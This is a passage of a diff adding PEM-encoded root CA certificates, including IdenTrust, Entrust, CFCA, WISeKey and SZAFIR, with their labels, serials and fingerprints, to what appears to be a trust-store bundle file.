+MjEyMDgxMTEwMjhaMFgxCzAJBgNVBAYTAk5MMR4wHAYDVQQKDBVTdGFhdCBkZXIg +TmVkZXJsYW5kZW4xKTAnBgNVBAMMIFN0YWF0IGRlciBOZWRlcmxhbmRlbiBFViBS +b290IENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA48d+ifkkSzrS +M4M1LGns3Amk41GoJSt5uAg94JG6hIXGhaTK5skuU6TJJB79VWZxXSzFYGgEt9nC +UiY4iKTWO0Cmws0/zZiTs1QUWJZV1VD+hq2kY39ch/aO5ieSZxeSAgMs3NZmdO3d +Z//BYY1jTw+bbRcwJu+r0h8QoPnFfxZpgQNH7R5ojXKhTbImxrpsX23Wr9GxE46p +rfNeaXUmGD5BKyF/7otdBwadQ8QpCiv8Kj6GyzyDOvnJDdrFmeK8eEEzduG/L13l +pJhQDBXd4Pqcfzho0LKmeqfRMb1+ilgnQ7O6M5HTp5gVXJrm0w912fxBmJc+qiXb +j5IusHsMX/FjqTf5m3VpTCgmJdrV8hJwRVXj33NeN/UhbJCONVrJ0yPr08C+eKxC +KFhmpUZtcALXEPlLVPxdhkqHz3/KRawRWrUgUY0viEeXOcDPusBCAUCZSCELa6fS +/ZbV0b5GnUngC6agIk440ME8MLxwjyx1zNDFjFE7PZQIZCZhfbnDZY8UnCHQqv0X +cgOPvZuM5l5Tnrmd74K74bzickFbIZTTRTeU0d8JOV3nI6qaHcptqAqGhYqCvkIH +1vI4gnPah1vlPNOePqc7nvQDs/nxfRN0Av+7oeX6AHkcpmZBiFxgV6YuCcS6/ZrP +px9Aw7vMWgpVSzs4dlG4Y4uElBbmVvMCAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB +/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFP6rAJCYniT8qcwaivsnuL8wbqg7 +MA0GCSqGSIb3DQEBCwUAA4ICAQDPdyxuVr5Os7aEAJSrR8kN0nbHhp8dB9O2tLsI +eK9p0gtJ3jPFrK3CiAJ9Brc1AsFgyb/E6JTe1NOpEyVa/m6irn0F3H3zbPB+po3u +2dfOWBfoqSmuc0iH55vKbimhZF8ZE/euBhD/UcabTVUlT5OZEAFTdfETzsemQUHS +v4ilf0X8rLiltTMMgsT7B/Zq5SWEXwbKwYY5EdtYzXc7LMJMD16a4/CrPmEbUCTC +wPTxGfARKbalGAKb12NMcIxHowNDXLldRqANb/9Zjr7dn3LDWyvfjFvO5QxGbJKy +CqNMVEIYFRIYvdr8unRu/8G2oGTYqV9Vrp9canaW2HNnh/tNf1zuacpzEPuKqf2e +vTY4SUmH9A4U8OmHuD+nT3pajnnUk+S7aFKErGzp85hwVXIy+TSrK0m1zSBi5Dp6 +Z2Orltxtrpfs/J92VoguZs9btsmksNcFuuEnL5O7Jiqik7Ab846+HUCjuTaPPoIa +Gl6I6lD4WeKDRikL40Rc4ZW2aZCaFG+XroHPaO+Zmr615+F/+PoTRxZMzG0IQOeL +eG9QgkRQP2YGiqtDhFZKDyAthg710tvSeopLzaXoTvFeJiUBWSOgftL2fiFX1ye8 +FVdMpEbB4IMeDExNH08GGeL5qPQ6gqGyeUN51q1veieQA6TqJIc/2b3Z6fJfUEkc +7uzXLg== +-----END CERTIFICATE----- + +# Issuer: CN=IdenTrust Commercial Root CA 1 O=IdenTrust +# Subject: CN=IdenTrust Commercial Root CA 1 O=IdenTrust +# Label: "IdenTrust Commercial Root CA 1" +# Serial: 13298821034946342390520003877796839426 +# MD5 Fingerprint: b3:3e:77:73:75:ee:a0:d3:e3:7e:49:63:49:59:bb:c7 +# SHA1 Fingerprint: df:71:7e:aa:4a:d9:4e:c9:55:84:99:60:2d:48:de:5f:bc:f0:3a:25 +# SHA256 Fingerprint: 5d:56:49:9b:e4:d2:e0:8b:cf:ca:d0:8a:3e:38:72:3d:50:50:3b:de:70:69:48:e4:2f:55:60:30:19:e5:28:ae +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIQCgFCgAAAAUUjyES1AAAAAjANBgkqhkiG9w0BAQsFADBK +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScwJQYDVQQDEx5JZGVu +VHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwHhcNMTQwMTE2MTgxMjIzWhcNMzQw +MTE2MTgxMjIzWjBKMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScw +JQYDVQQDEx5JZGVuVHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCnUBneP5k91DNG8W9RYYKyqU+PZ4ldhNlT +3Qwo2dfw/66VQ3KZ+bVdfIrBQuExUHTRgQ18zZshq0PirK1ehm7zCYofWjK9ouuU ++ehcCuz/mNKvcbO0U59Oh++SvL3sTzIwiEsXXlfEU8L2ApeN2WIrvyQfYo3fw7gp +S0l4PJNgiCL8mdo2yMKi1CxUAGc1bnO/AljwpN3lsKImesrgNqUZFvX9t++uP0D1 +bVoE/c40yiTcdCMbXTMTEl3EASX2MN0CXZ/g1Ue9tOsbobtJSdifWwLziuQkkORi +T0/Br4sOdBeo0XKIanoBScy0RnnGF7HamB4HWfp1IYVl3ZBWzvurpWCdxJ35UrCL +vYf5jysjCiN2O/cz4ckA82n5S6LgTrx+kzmEB/dEcH7+B1rlsazRGMzyNeVJSQjK +Vsk9+w8YfYs7wRPCTY/JTw436R+hDmrfYi7LNQZReSzIJTj0+kuniVyc0uMNOYZK +dHzVWYfCP04MXFL0PfdSgvHqo6z9STQaKPNBiDoT7uje/5kdX7rL6B7yuVBgwDHT +c+XvvqDtMwt0viAgxGds8AgDelWAf0ZOlqf0Hj7h9tgJ4TNkK2PXMl6f+cB7D3hv +l7yTmvmcEpB4eoCHFddydJxVdHixuuFucAS6T6C6aMN7/zHwcz09lCqxC0EOoP5N +iGVreTO01wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB +/zAdBgNVHQ4EFgQU7UQZwNPwBovupHu+QucmVMiONnYwDQYJKoZIhvcNAQELBQAD +ggIBAA2ukDL2pkt8RHYZYR4nKM1eVO8lvOMIkPkp165oCOGUAFjvLi5+U1KMtlwH +6oi6mYtQlNeCgN9hCQCTrQ0U5s7B8jeUeLBfnLOic7iPBZM4zY0+sLj7wM+x8uwt +LRvM7Kqas6pgghstO8OEPVeKlh6cdbjTMM1gCIOQ045U8U1mwF10A0Cj7oV+wh93 +nAbowacYXVKV7cndJZ5t+qntozo00Fl72u1Q8zW/7esUTTHHYPTa8Yec4kjixsU3 ++wYQ+nVZZjFHKdp2mhzpgq7vmrlR94gjmmmVYjzlVYA211QC//G5Xc7UI2/YRYRK +W2XviQzdFKcgyxilJbQN+QHwotL0AMh0jqEqSI5l2xPE4iUXfeu+h1sXIFRRk0pT +AwvsXcoz7WL9RccvW9xYoIA55vrX/hMUpu09lEpCdNTDd1lzzY9GvlU47/rokTLq +l1gEIt44w8y8bckzOmoKaT+gyOpyj4xjhiO9bTyWnpXgSUyqorkqG5w2gXjtw+hG +4iZZRHUe2XWJUc0QhJ1hYMtd+ZciTY6Y5uN/9lu7rs3KSoFrXgvzUeF0K+l+J6fZ +mUlO+KWA2yUPHGNiiskzZ2s8EIPGrd6ozRaOjfAHN3Gf8qv8QfXBi+wAN10J5U6A +7/qxXDgGpRtK4dw4LTzcqx+QGtVKnO7RcGzM7vRX+Bi6hG6H +-----END CERTIFICATE----- + +# Issuer: CN=IdenTrust Public Sector Root CA 1 O=IdenTrust +# Subject: CN=IdenTrust Public Sector Root CA 1 O=IdenTrust +# Label: "IdenTrust Public Sector Root CA 1" +# Serial: 13298821034946342390521976156843933698 +# MD5 Fingerprint: 37:06:a5:b0:fc:89:9d:ba:f4:6b:8c:1a:64:cd:d5:ba +# SHA1 Fingerprint: ba:29:41:60:77:98:3f:f4:f3:ef:f2:31:05:3b:2e:ea:6d:4d:45:fd +# SHA256 Fingerprint: 30:d0:89:5a:9a:44:8a:26:20:91:63:55:22:d1:f5:20:10:b5:86:7a:ca:e1:2c:78:ef:95:8f:d4:f4:38:9f:2f +-----BEGIN CERTIFICATE----- +MIIFZjCCA06gAwIBAgIQCgFCgAAAAUUjz0Z8AAAAAjANBgkqhkiG9w0BAQsFADBN +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MSowKAYDVQQDEyFJZGVu +VHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwHhcNMTQwMTE2MTc1MzMyWhcN +MzQwMTE2MTc1MzMyWjBNMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0 +MSowKAYDVQQDEyFJZGVuVHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC2IpT8pEiv6EdrCvsnduTyP4o7 +ekosMSqMjbCpwzFrqHd2hCa2rIFCDQjrVVi7evi8ZX3yoG2LqEfpYnYeEe4IFNGy +RBb06tD6Hi9e28tzQa68ALBKK0CyrOE7S8ItneShm+waOh7wCLPQ5CQ1B5+ctMlS +bdsHyo+1W/CD80/HLaXIrcuVIKQxKFdYWuSNG5qrng0M8gozOSI5Cpcu81N3uURF +/YTLNiCBWS2ab21ISGHKTN9T0a9SvESfqy9rg3LvdYDaBjMbXcjaY8ZNzaxmMc3R +3j6HEDbhuaR672BQssvKplbgN6+rNBM5Jeg5ZuSYeqoSmJxZZoY+rfGwyj4GD3vw +EUs3oERte8uojHH01bWRNszwFcYr3lEXsZdMUD2xlVl8BX0tIdUAvwFnol57plzy +9yLxkA2T26pEUWbMfXYD62qoKjgZl3YNa4ph+bz27nb9cCvdKTz4Ch5bQhyLVi9V +GxyhLrXHFub4qjySjmm2AcG1hp2JDws4lFTo6tyePSW8Uybt1as5qsVATFSrsrTZ +2fjXctscvG29ZV/viDUqZi/u9rNl8DONfJhBaUYPQxxp+pu10GFqzcpL2UyQRqsV +WaFHVCkugyhfHMKiq3IXAAaOReyL4jM9f9oZRORicsPfIsbyVtTdX5Vy7W1f90gD +W/3FKqD2cyOEEBsB5wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/ +BAUwAwEB/zAdBgNVHQ4EFgQU43HgntinQtnbcZFrlJPrw6PRFKMwDQYJKoZIhvcN +AQELBQADggIBAEf63QqwEZE4rU1d9+UOl1QZgkiHVIyqZJnYWv6IAcVYpZmxI1Qj +t2odIFflAWJBF9MJ23XLblSQdf4an4EKwt3X9wnQW3IV5B4Jaj0z8yGa5hV+rVHV +DRDtfULAj+7AmgjVQdZcDiFpboBhDhXAuM/FSRJSzL46zNQuOAXeNf0fb7iAaJg9 +TaDKQGXSc3z1i9kKlT/YPyNtGtEqJBnZhbMX73huqVjRI9PHE+1yJX9dsXNw0H8G +lwmEKYBhHfpe/3OsoOOJuBxxFcbeMX8S3OFtm6/n6J91eEyrRjuazr8FGF1NFTwW +mhlQBJqymm9li1JfPFgEKCXAZmExfrngdbkaqIHWchezxQMxNRF4eKLg6TCMf4Df +WN88uieW4oA0beOY02QnrEh+KHdcxiVhJfiFDGX6xDIvpZgF5PgLZxYWxoK4Mhn5 ++bl53B/N66+rDt0b20XkeucC4pVd/GnwU2lhlXV5C15V5jgclKlZM57IcXR5f1GJ +tshquDDIajjDbp7hNxbqBWJMWxJH7ae0s1hWx0nzfxJoCTFx8G34Tkf71oXuxVhA +GaQdp/lLQzfcaFpPz+vCZHTetBXZ9FRUGi8c15dxVJCO2SCdUyt/q4/i6jC8UDfv +8Ue1fXwsBOxonbRJRBD0ckscZOf85muQ3Wl9af0AVqW3rLatt8o+Ae+c +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority - G2 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2009 Entrust, Inc. - for authorized use only +# Subject: CN=Entrust Root Certification Authority - G2 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2009 Entrust, Inc. - for authorized use only +# Label: "Entrust Root Certification Authority - G2" +# Serial: 1246989352 +# MD5 Fingerprint: 4b:e2:c9:91:96:65:0c:f4:0e:5a:93:92:a0:0a:fe:b2 +# SHA1 Fingerprint: 8c:f4:27:fd:79:0c:3a:d1:66:06:8d:e8:1e:57:ef:bb:93:22:72:d4 +# SHA256 Fingerprint: 43:df:57:74:b0:3e:7f:ef:5f:e4:0d:93:1a:7b:ed:f1:bb:2e:6b:42:73:8c:4e:6d:38:41:10:3d:3a:a7:f3:39 +-----BEGIN CERTIFICATE----- +MIIEPjCCAyagAwIBAgIESlOMKDANBgkqhkiG9w0BAQsFADCBvjELMAkGA1UEBhMC +VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50 +cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3Qs +IEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVz +dCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzIwHhcNMDkwNzA3MTcy +NTU0WhcNMzAxMjA3MTc1NTU0WjCBvjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVu +dHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50cnVzdC5uZXQvbGVnYWwt +dGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3QsIEluYy4gLSBmb3IgYXV0 +aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVzdCBSb290IENlcnRpZmlj +YXRpb24gQXV0aG9yaXR5IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK +AoIBAQC6hLZy254Ma+KZ6TABp3bqMriVQRrJ2mFOWHLP/vaCeb9zYQYKpSfYs1/T +RU4cctZOMvJyig/3gxnQaoCAAEUesMfnmr8SVycco2gvCoe9amsOXmXzHHfV1IWN +cCG0szLni6LVhjkCsbjSR87kyUnEO6fe+1R9V77w6G7CebI6C1XiUJgWMhNcL3hW +wcKUs/Ja5CeanyTXxuzQmyWC48zCxEXFjJd6BmsqEZ+pCm5IO2/b1BEZQvePB7/1 +U1+cPvQXLOZprE4yTGJ36rfo5bs0vBmLrpxR57d+tVOxMyLlbc9wPBr64ptntoP0 +jaWvYkxN4FisZDQSA/i2jZRjJKRxAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAP +BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqciZ60B7vfec7aVHUbI2fkBJmqzAN +BgkqhkiG9w0BAQsFAAOCAQEAeZ8dlsa2eT8ijYfThwMEYGprmi5ZiXMRrEPR9RP/ +jTkrwPK9T3CMqS/qF8QLVJ7UG5aYMzyorWKiAHarWWluBh1+xLlEjZivEtRh2woZ +Rkfz6/djwUAFQKXSt/S1mja/qYh2iARVBCuch38aNzx+LaUa2NSJXsq9rD1s2G2v +1fN2D807iDginWyTmsQ9v4IbZT+mD12q/OWyFcq1rca8PdCE6OoGcrBNOTJ4vz4R +nAuknZoh8/CbCzB428Hch0P+vGOaysXCHMnHjf87ElgI5rY97HosTvuDls4MPGmH +VHOkc8KT/1EQrBVUAdj8BbGJoX90g5pJ19xOe4pIb4tF9g== +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority - EC1 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2012 Entrust, Inc. - for authorized use only +# Subject: CN=Entrust Root Certification Authority - EC1 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2012 Entrust, Inc. - for authorized use only +# Label: "Entrust Root Certification Authority - EC1" +# Serial: 51543124481930649114116133369 +# MD5 Fingerprint: b6:7e:1d:f0:58:c5:49:6c:24:3b:3d:ed:98:18:ed:bc +# SHA1 Fingerprint: 20:d8:06:40:df:9b:25:f5:12:25:3a:11:ea:f7:59:8a:eb:14:b5:47 +# SHA256 Fingerprint: 02:ed:0e:b2:8c:14:da:45:16:5c:56:67:91:70:0d:64:51:d7:fb:56:f0:b2:ab:1d:3b:8e:b0:70:e5:6e:df:f5 +-----BEGIN CERTIFICATE----- +MIIC+TCCAoCgAwIBAgINAKaLeSkAAAAAUNCR+TAKBggqhkjOPQQDAzCBvzELMAkG +A1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3 +d3cuZW50cnVzdC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDEyIEVu +dHJ1c3QsIEluYy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEzMDEGA1UEAxMq +RW50cnVzdCBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRUMxMB4XDTEy +MTIxODE1MjUzNloXDTM3MTIxODE1NTUzNlowgb8xCzAJBgNVBAYTAlVTMRYwFAYD +VQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1c3QubmV0 +L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykgMjAxMiBFbnRydXN0LCBJbmMuIC0g +Zm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMzAxBgNVBAMTKkVudHJ1c3QgUm9vdCBD +ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEVDMTB2MBAGByqGSM49AgEGBSuBBAAi +A2IABIQTydC6bUF74mzQ61VfZgIaJPRbiWlH47jCffHyAsWfoPZb1YsGGYZPUxBt +ByQnoaD41UcZYUx9ypMn6nQM72+WCf5j7HBdNq1nd67JnXxVRDqiY1Ef9eNi1KlH +Bz7MIKNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0O +BBYEFLdj5xrdjekIplWDpOBqUEFlEUJJMAoGCCqGSM49BAMDA2cAMGQCMGF52OVC +R98crlOZF7ZvHH3hvxGU0QOIdeSNiaSKd0bebWHvAvX7td/M/k7//qnmpwIwW5nX +hTcGtXsI/esni0qU+eH6p44mCOh8kmhtc9hvJqwhAriZtyZBWyVgrtBIGu4G +-----END CERTIFICATE----- + +# Issuer: CN=CFCA EV ROOT O=China Financial Certification Authority +# Subject: CN=CFCA EV ROOT O=China Financial Certification Authority +# Label: "CFCA EV ROOT" +# Serial: 407555286 +# MD5 Fingerprint: 74:e1:b6:ed:26:7a:7a:44:30:33:94:ab:7b:27:81:30 +# SHA1 Fingerprint: e2:b8:29:4b:55:84:ab:6b:58:c2:90:46:6c:ac:3f:b8:39:8f:84:83 +# SHA256 Fingerprint: 5c:c3:d7:8e:4e:1d:5e:45:54:7a:04:e6:87:3e:64:f9:0c:f9:53:6d:1c:cc:2e:f8:00:f3:55:c4:c5:fd:70:fd +-----BEGIN CERTIFICATE----- +MIIFjTCCA3WgAwIBAgIEGErM1jANBgkqhkiG9w0BAQsFADBWMQswCQYDVQQGEwJD +TjEwMC4GA1UECgwnQ2hpbmEgRmluYW5jaWFsIENlcnRpZmljYXRpb24gQXV0aG9y +aXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJPT1QwHhcNMTIwODA4MDMwNzAxWhcNMjkx +MjMxMDMwNzAxWjBWMQswCQYDVQQGEwJDTjEwMC4GA1UECgwnQ2hpbmEgRmluYW5j +aWFsIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MRUwEwYDVQQDDAxDRkNBIEVWIFJP +T1QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDXXWvNED8fBVnVBU03 +sQ7smCuOFR36k0sXgiFxEFLXUWRwFsJVaU2OFW2fvwwbwuCjZ9YMrM8irq93VCpL +TIpTUnrD7i7es3ElweldPe6hL6P3KjzJIx1qqx2hp/Hz7KDVRM8Vz3IvHWOX6Jn5 +/ZOkVIBMUtRSqy5J35DNuF++P96hyk0g1CXohClTt7GIH//62pCfCqktQT+x8Rgp +7hZZLDRJGqgG16iI0gNyejLi6mhNbiyWZXvKWfry4t3uMCz7zEasxGPrb382KzRz +EpR/38wmnvFyXVBlWY9ps4deMm/DGIq1lY+wejfeWkU7xzbh72fROdOXW3NiGUgt +hxwG+3SYIElz8AXSG7Ggo7cbcNOIabla1jj0Ytwli3i/+Oh+uFzJlU9fpy25IGvP +a931DfSCt/SyZi4QKPaXWnuWFo8BGS1sbn85WAZkgwGDg8NNkt0yxoekN+kWzqot +aK8KgWU6cMGbrU1tVMoqLUuFG7OA5nBFDWteNfB/O7ic5ARwiRIlk9oKmSJgamNg +TnYGmE69g60dWIolhdLHZR4tjsbftsbhf4oEIRUpdPA+nJCdDC7xij5aqgwJHsfV +PKPtl8MeNPo4+QgO48BdK4PRVmrJtqhUUy54Mmc9gn900PvhtgVguXDbjgv5E1hv +cWAQUhC5wUEJ73IfZzF4/5YFjQIDAQABo2MwYTAfBgNVHSMEGDAWgBTj/i39KNAL +tbq2osS/BqoFjJP7LzAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAd +BgNVHQ4EFgQU4/4t/SjQC7W6tqLEvwaqBYyT+y8wDQYJKoZIhvcNAQELBQADggIB +ACXGumvrh8vegjmWPfBEp2uEcwPenStPuiB/vHiyz5ewG5zz13ku9Ui20vsXiObT +ej/tUxPQ4i9qecsAIyjmHjdXNYmEwnZPNDatZ8POQQaIxffu2Bq41gt/UP+TqhdL +jOztUmCypAbqTuv0axn96/Ua4CUqmtzHQTb3yHQFhDmVOdYLO6Qn+gjYXB74BGBS +ESgoA//vU2YApUo0FmZ8/Qmkrp5nGm9BC2sGE5uPhnEFtC+NiWYzKXZUmhH4J/qy +P5Hgzg0b8zAarb8iXRvTvyUFTeGSGn+ZnzxEk8rUQElsgIfXBDrDMlI1Dlb4pd19 +xIsNER9Tyx6yF7Zod1rg1MvIB671Oi6ON7fQAUtDKXeMOZePglr4UeWJoBjnaH9d +Ci77o0cOPaYjesYBx4/IXr9tgFa+iiS6M+qf4TIRnvHST4D2G0CvOJ4RUHlzEhLN +5mydLIhyPDCBBpEi6lmt2hkuIsKNuYyH4Ga8cyNfIWRjgEj1oDwYPZTISEEdQLpe +/v5WOaHIz16eGWRGENoXkbcFgKyLmZJ956LYBws2J+dIeWCKw9cTXPhyQN9Ky8+Z +AAoACxGV2lZFA4gKn2fQ1XmxqI1AbQ3CekD6819kR5LLU7m7Wc5P/dAVUwHY3+vZ +5nbv0CO7O6l5s9UCKc2Jo5YPSjXnTkLAdc0Hz+Ys63su +-----END CERTIFICATE----- + +# Issuer: CN=OISTE WISeKey Global Root GB CA O=WISeKey OU=OISTE Foundation Endorsed +# Subject: CN=OISTE WISeKey Global Root GB CA O=WISeKey OU=OISTE Foundation Endorsed +# Label: "OISTE WISeKey Global Root GB CA" +# Serial: 157768595616588414422159278966750757568 +# MD5 Fingerprint: a4:eb:b9:61:28:2e:b7:2f:98:b0:35:26:90:99:51:1d +# SHA1 Fingerprint: 0f:f9:40:76:18:d3:d7:6a:4b:98:f0:a8:35:9e:0c:fd:27:ac:cc:ed +# SHA256 Fingerprint: 6b:9c:08:e8:6e:b0:f7:67:cf:ad:65:cd:98:b6:21:49:e5:49:4a:67:f5:84:5e:7b:d1:ed:01:9f:27:b8:6b:d6 +-----BEGIN CERTIFICATE----- +MIIDtTCCAp2gAwIBAgIQdrEgUnTwhYdGs/gjGvbCwDANBgkqhkiG9w0BAQsFADBt +MQswCQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUg +Rm91bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9i +YWwgUm9vdCBHQiBDQTAeFw0xNDEyMDExNTAwMzJaFw0zOTEyMDExNTEwMzFaMG0x +CzAJBgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBG +b3VuZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2Jh +bCBSb290IEdCIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2Be3 +HEokKtaXscriHvt9OO+Y9bI5mE4nuBFde9IllIiCFSZqGzG7qFshISvYD06fWvGx +WuR51jIjK+FTzJlFXHtPrby/h0oLS5daqPZI7H17Dc0hBt+eFf1Biki3IPShehtX +1F1Q/7pn2COZH8g/497/b1t3sWtuuMlk9+HKQUYOKXHQuSP8yYFfTvdv37+ErXNk +u7dCjmn21HYdfp2nuFeKUWdy19SouJVUQHMD9ur06/4oQnc/nSMbsrY9gBQHTC5P +99UKFg29ZkM3fiNDecNAhvVMKdqOmq0NpQSHiB6F4+lT1ZvIiwNjeOvgGUpuuy9r +M2RYk61pv48b74JIxwIDAQABo1EwTzALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUNQ/INmNe4qPs+TtmFc5RUuORmj0wEAYJKwYBBAGCNxUB +BAMCAQAwDQYJKoZIhvcNAQELBQADggEBAEBM+4eymYGQfp3FsLAmzYh7KzKNbrgh +cViXfa43FK8+5/ea4n32cZiZBKpDdHij40lhPnOMTZTg+XHEthYOU3gf1qKHLwI5 +gSk8rxWYITD+KJAAjNHhy/peyP34EEY7onhCkRd0VQreUGdNZtGn//3ZwLWoo4rO +ZvUPQ82nK1d7Y0Zqqi5S2PTt4W2tKZB4SLrhI6qjiey1q5bAtEuiHZeeevJuQHHf +aPFlTc58Bd9TZaml8LGXBHAVRgOY1NK/VLSgWH1Sb9pWJmLU2NuJMW8c8CLC02Ic +Nc1MaRVUGpCY3useX8p3x8uOPUNpnJpY0CQ73xtAln41rYHHTnG6iBM= +-----END CERTIFICATE----- + +# Issuer: CN=SZAFIR ROOT CA2 O=Krajowa Izba Rozliczeniowa S.A. +# Subject: CN=SZAFIR ROOT CA2 O=Krajowa Izba Rozliczeniowa S.A. +# Label: "SZAFIR ROOT CA2" +# Serial: 357043034767186914217277344587386743377558296292 +# MD5 Fingerprint: 11:64:c1:89:b0:24:b1:8c:b1:07:7e:89:9e:51:9e:99 +# SHA1 Fingerprint: e2:52:fa:95:3f:ed:db:24:60:bd:6e:28:f3:9c:cc:cf:5e:b3:3f:de +# SHA256 Fingerprint: a1:33:9d:33:28:1a:0b:56:e5:57:d3:d3:2b:1c:e7:f9:36:7e:b0:94:bd:5f:a7:2a:7e:50:04:c8:de:d7:ca:fe +-----BEGIN CERTIFICATE----- +MIIDcjCCAlqgAwIBAgIUPopdB+xV0jLVt+O2XwHrLdzk1uQwDQYJKoZIhvcNAQEL +BQAwUTELMAkGA1UEBhMCUEwxKDAmBgNVBAoMH0tyYWpvd2EgSXpiYSBSb3psaWN6 +ZW5pb3dhIFMuQS4xGDAWBgNVBAMMD1NaQUZJUiBST09UIENBMjAeFw0xNTEwMTkw +NzQzMzBaFw0zNTEwMTkwNzQzMzBaMFExCzAJBgNVBAYTAlBMMSgwJgYDVQQKDB9L +cmFqb3dhIEl6YmEgUm96bGljemVuaW93YSBTLkEuMRgwFgYDVQQDDA9TWkFGSVIg +Uk9PVCBDQTIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC3vD5QqEvN +QLXOYeeWyrSh2gwisPq1e3YAd4wLz32ohswmUeQgPYUM1ljj5/QqGJ3a0a4m7utT +3PSQ1hNKDJA8w/Ta0o4NkjrcsbH/ON7Dui1fgLkCvUqdGw+0w8LBZwPd3BucPbOw +3gAeqDRHu5rr/gsUvTaE2g0gv/pby6kWIK05YO4vdbbnl5z5Pv1+TW9NL++IDWr6 +3fE9biCloBK0TXC5ztdyO4mTp4CEHCdJckm1/zuVnsHMyAHs6A6KCpbns6aH5db5 +BSsNl0BwPLqsdVqc1U2dAgrSS5tmS0YHF2Wtn2yIANwiieDhZNRnvDF5YTy7ykHN +XGoAyDw4jlivAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD +AgEGMB0GA1UdDgQWBBQuFqlKGLXLzPVvUPMjX/hd56zwyDANBgkqhkiG9w0BAQsF +AAOCAQEAtXP4A9xZWx126aMqe5Aosk3AM0+qmrHUuOQn/6mWmc5G4G18TKI4pAZw +8PRBEew/R40/cof5O/2kbytTAOD/OblqBw7rHRz2onKQy4I9EYKL0rufKq8h5mOG +nXkZ7/e7DDWQw4rtTw/1zBLZpD67oPwglV9PJi8RI4NOdQcPv5vRtB3pEAT+ymCP +oky4rc/hkA/NrgrHXXu3UNLUYfrVFdvXn4dRVOul4+vJhaAlIDf7js4MNIThPIGy +d05DpYhfhmehPea0XGG2Ptv+tyjFogeutcrKjSoS75ftwjCkySp6+/NNIxuZMzSg +LvWpCz/UXeHPhJ/iGcJfitYgHuNztw== +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Network CA 2 O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Network CA 2 O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Label: "Certum Trusted Network CA 2" +# Serial: 44979900017204383099463764357512596969 +# MD5 Fingerprint: 6d:46:9e:d9:25:6d:08:23:5b:5e:74:7d:1e:27:db:f2 +# SHA1 Fingerprint: d3:dd:48:3e:2b:bf:4c:05:e8:af:10:f5:fa:76:26:cf:d3:dc:30:92 +# SHA256 Fingerprint: b6:76:f2:ed:da:e8:77:5c:d3:6c:b0:f6:3c:d1:d4:60:39:61:f4:9e:62:65:ba:01:3a:2f:03:07:b6:d0:b8:04 